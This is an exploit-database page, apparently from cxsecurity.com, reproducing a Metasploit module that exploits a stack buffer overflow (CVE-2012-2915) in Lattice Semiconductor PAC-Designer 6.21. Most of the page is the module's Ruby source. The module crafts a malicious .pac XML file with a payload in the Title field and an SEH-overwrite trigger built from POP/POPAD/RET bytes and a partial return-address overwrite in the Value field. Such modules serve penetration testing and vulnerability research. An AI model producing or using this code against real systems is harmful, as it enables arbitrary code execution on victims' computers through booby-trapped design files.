Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow

2012.06.15
Credit: sinn3r
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer 6.21. As a .pac file, when supplying a long string of data to the 'value' field under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption on the stack, which results in arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', #Discovery 'juan vazquez', #Metasploit 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2012-2915'], ['OSVDB', '82001'], ['EDB', '19006'], ['BID', '53566'], ['URL', 'http://secunia.com/advisories/48741'] ], 'Payload' => { 'BadChars' => "\x00\x3c\x3e", 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'ExitFunction' => "seh" }, 'Platform' => 'win', 'Targets' => [ [ 'PAC-Designer 6.21 on Windows XP SP3', { # P/P/R in PACD621.exe # ASLR: False, Rebase: False, SafeSEH: False, OS: False 'Ret' => 0x00805020 } ], ], 'Privileged' => false, 'DisclosureDate' => "May 16 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The filename', 'msf.pac']) ], self.class) end def exploit # The payload is placed in the <title> field p = payload.encoded # The trigger is placed in the <value> field, which will jmp to our # payload in the <title> field. buf = "\x5f" #POP EDI buf << "\x5f" #POP EDI buf << "\x5c" #POP ESP buf << "\x61"*6 #POPAD x 6 buf << "\x51" #PUSH ECX buf << "\xc3" #RET buf << rand_text_alpha(96-buf.length, payload_badchars) buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}" #Jmp back to the beginning of the buffer buf << [target.ret].pack('V')[0,3] # Partial overwrite xml = %Q|<?xml version="1.0"?> <PacDesignData> <DocFmtVersion>1</DocFmtVersion> <DeviceType>ispPAC-CLK5410D</DeviceType> <CreatedBy>PAC-Designer 6.21.1336</CreatedBy> <SummaryInformation> <Title>#{p}</Title> <Author>#{Rex::Text.rand_text_alpha(6)}</Author> </SummaryInformation> <SymbolicSchematicData> <Symbol> <SymKey>153</SymKey> <NameText>Profile 0 Ref Frequency</NameText> <Value>#{buf}</Value> </Symbol> </SymbolicSchematicData> </PacDesignData>| file_create(xml) end end

References:

http://secunia.com/advisories/48741


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top